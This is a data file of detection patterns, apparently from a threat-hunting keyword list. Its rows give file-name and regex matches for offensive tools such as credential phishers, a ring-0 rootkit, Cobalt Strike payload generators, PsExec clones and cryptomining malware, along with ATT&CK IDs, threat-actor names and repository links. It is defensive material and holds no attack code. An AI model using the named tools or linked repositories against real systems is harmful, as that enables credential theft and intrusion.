"*/CredPhisher.exe*",".{0,1000}\/CredPhisher\.exe.{0,1000}","offensive_tool_keyword","taowu-cobalt-strike","Collection of hacktools binaries","T1003 - T1059 - T1087 - T1110 - T1135 - T1047 - 
T1078 - T1086 - T1098 - T1212 - T1021 - T1056 - T1071 - T1210 - T1484 - T1555 - T1055 - T1005 - T1090 - T1080 - T1204 - T1496 - T1114 - T1562 - T1482 - T1505 - T1548 - T1560 - T1566 - T1218 - T1547 - T1070 - T1206 - T1208","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/pandasec888/taowu-cobalt_strike/tree/312fec79b3413ecfc06bc43efccfcbc1383a3566","1","1","N/A","N/A","10","10","1797","330","2023-10-31T09:13:10Z","2020-07-05T10:13:00Z","6263" "*/CredPhisher.exe*",".{0,1000}\/CredPhisher\.exe.{0,1000}","offensive_tool_keyword","Credphisher","prompt a user for credentials using a Windows credential dialog","T1056.002 - T1003 ","TA0006","N/A","N/A","Credential Access","https://github.com/ryanmrestivo/red-team/blob/1e53b7aa77717a22c9bd54facc64155a9a4c49fc/Exploitation-Tools/OffensiveCSharp/CredPhisher","1","1","N/A","N/A","7","2","136","34","2024-10-18T12:12:38Z","2021-04-12T00:00:03Z","6264" "*/CredPhisher/*",".{0,1000}\/CredPhisher\/.{0,1000}","offensive_tool_keyword","CredPhisher","Prompts the current user for their credentials using the CredUIPromptForWindowsCredentials WinAPI function","T1056.002 - T1111","TA0004 ","N/A","N/A","Phishing","https://github.com/matterpreter/OffensiveCSharp/tree/master/CredPhisher","1","1","N/A","N/A","10","10","1416","250","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z","6265" "*/CredPrompt.exe*",".{0,1000}\/CredPrompt\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - 
T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","1","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","6266" "*/CredPrompt/credprompt.c*",".{0,1000}\/CredPrompt\/credprompt\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE 
- APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/guervild/BOFs","1","1","N/A","N/A","10","10","161","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z","6267" "*/creds-*/creds.zip*",".{0,1000}\/creds\-.{0,1000}\/creds\.zip.{0,1000}","offensive_tool_keyword","DefaultCreds-cheat-sheet","One place for all the default credentials to assist the Blue/Red teamers activities on finding devices with default password","T1110.001 - T1110.003","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/ihebski/DefaultCreds-cheat-sheet","1","1","N/A","N/A","N/A","10","6048","726","2025-04-15T13:13:19Z","2021-01-01T19:02:36Z","6268" "*/creds-summary.nse*",".{0,1000}\/creds\-summary\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6269" "*/crlfinjection.txt*",".{0,1000}\/crlfinjection\.txt.{0,1000}","offensive_tool_keyword","0d1n","Tool for automating customized attacks against web applications. 
Fully made in C language with pthreads it has fast performance.","T1583 - T1584 - T1190 - T1133","TA0002 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/CoolerVoid/0d1n","1","1","N/A","N/A","7","","N/A","","","","6270" "*/Cronos-Rootkit*",".{0,1000}\/Cronos\-Rootkit.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","6276" "*/Cronos-Rootkit/*",".{0,1000}\/Cronos\-Rootkit\/.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","6277" "*/Cronos-x64.zip*",".{0,1000}\/Cronos\-x64\.zip.{0,1000}","offensive_tool_keyword","Cronos-Rootkit","Cronos is Windows 10/11 x64 ring 0 rootkit. Cronos is able to hide processes. 
protect and elevate them with token manipulation.","T1055 - T1078 - T1134 - T1562.001","TA0001 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/XaFF-XaFF/Cronos-Rootkit","1","1","N/A","N/A","N/A","9","899","186","2022-03-29T08:26:03Z","2021-08-25T08:54:45Z","6278" "*/CrossC2.*",".{0,1000}\/CrossC2\..{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","6279" 
"*/CrossC2/*",".{0,1000}\/CrossC2\/.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","6280" "*/CrossC2Kit*",".{0,1000}\/CrossC2Kit.{0,1000}","offensive_tool_keyword","cobaltstrike","CrossC2 developed based on the Cobalt Strike framework can be used for other cross-platform system control. CrossC2Kit provides some interfaces for users to call to manipulate the CrossC2 Beacon session. 
thereby extending the functionality of Cobalt Strike.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/CrossC2/CrossC2Kit","1","1","N/A","N/A","10","10","218","37","2023-08-08T19:52:07Z","2022-06-06T07:00:10Z","6281" "*/CrossC2Kit/*",".{0,1000}\/CrossC2Kit\/.{0,1000}","offensive_tool_keyword","cobaltstrike","generate CobaltStrike's cross-platform payload","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 
T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","6282" "*/CrossC2-test*",".{0,1000}\/CrossC2\-test.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","6283" "*/CrossNet-Beta/*",".{0,1000}\/CrossNet\-Beta\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobaltstrike payload generator","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - 
T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/dr0op/CrossNet-Beta","1","1","N/A","N/A","10","10","362","58","2024-06-19T07:02:22Z","2021-02-08T10:52:39Z","6284" "*/crunch-wordlist/*",".{0,1000}\/crunch\-wordlist\/.{0,1000}","offensive_tool_keyword","crunch","Generate a dictionary file containing words with a minimum and maximum length","T1596 - T1596.001","TA0043","N/A","N/A","Credential Access","https://sourceforge.net/projects/crunch-wordlist/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","6298" "*/crypt0p3g/*",".{0,1000}\/crypt0p3g\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOF) for Cobalt Strike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/crypt0p3g/bof-collection","1","1","N/A","N/A","10","10","175","27","2022-12-05T04:49:33Z","2021-01-20T06:07:38Z","6299" "*/cryptomining.git*",".{0,1000}\/cryptomining\.git.{0,1000}","offensive_tool_keyword","cryptomining","A Linux Cyptomining malware","T1496","TA0009","N/A","N/A","Cryptomining","https://github.com/tarcisio-marinho/cryptomining","1","1","#linux","N/A","7","1","36","15","2023-05-05T02:42:59Z","2018-04-07T03:59:52Z","6300" "*/crytox.hta*",".{0,1000}\/crytox\.hta.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","0","N/A","ransom 
notes","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","6301" "*/cs2modrewrite/*",".{0,1000}\/cs2modrewrite\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Convert Cobalt Strike profiles to modrewrite scripts","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/threatexpress/cs2modrewrite","1","1","N/A","N/A","10","10","599","117","2023-01-30T17:47:51Z","2017-06-06T14:53:57Z","6302" "*/CS-BOFs/*",".{0,1000}\/CS\-BOFs\/.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of CobaltStrike beacon object files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - 
T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/pwn1sher/CS-BOFs","1","1","N/A","N/A","10","10","103","22","2022-02-14T09:47:30Z","2021-01-18T08:54:48Z","6303" "*/csexec.exe*",".{0,1000}\/csexec\.exe.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","1","N/A","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","6304" "*/CSExec.git*",".{0,1000}\/CSExec\.git.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral 
Movement","https://github.com/malcomvetter/CSExec","1","1","N/A","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","6305" "*/CSExec.py*",".{0,1000}\/CSExec\.py.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","N/A","private github repo","10","","N/A","","","","6306" "*/CSExec.py.git*",".{0,1000}\/CSExec\.py\.git.{0,1000}","offensive_tool_keyword","CSExec","An alternative to *exec.py from impacket with some builtin tricks","T1059.001 - T1059.005 - T1071.001","TA0002","N/A","N/A","Lateral Movement","https://github.com/Metro-Holografix/CSExec.py","1","1","N/A","private github repo","10","","N/A","","","","6307" "*/csexecsvc.exe*",".{0,1000}\/csexecsvc\.exe.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","1","N/A","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","6308" "*/csexecsvc-net35.exe*",".{0,1000}\/csexecsvc\-net35\.exe.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","1","N/A","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","6309" "*/csexecsvc-net40.exe*",".{0,1000}\/csexecsvc\-net40\.exe.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","1","N/A","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","6310" 
"*/csexecsvc-net45.exe*",".{0,1000}\/csexecsvc\-net45\.exe.{0,1000}","offensive_tool_keyword","csexec","An implementation of PSExec in C#","T1021.002 - T1059.004 - T1077","TA0008 - TA0009 - TA0011","N/A","N/A","Lateral Movement","https://github.com/malcomvetter/CSExec","1","1","N/A","N/A","10","4","325","62","2020-12-01T14:52:01Z","2018-08-08T21:09:07Z","6311" "*/csharp/process_injection/*",".{0,1000}\/csharp\/process_injection\/.{0,1000}","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1027 - T1055 - T1070 - T1112 - T1140","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","10","1668","270","2023-11-03T09:33:21Z","2021-08-02T15:35:57Z","6312" "*/CSharpWinRM*",".{0,1000}\/CSharpWinRM.{0,1000}","offensive_tool_keyword","cobaltstrike","C++ WinRM API via Reflective DLL","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 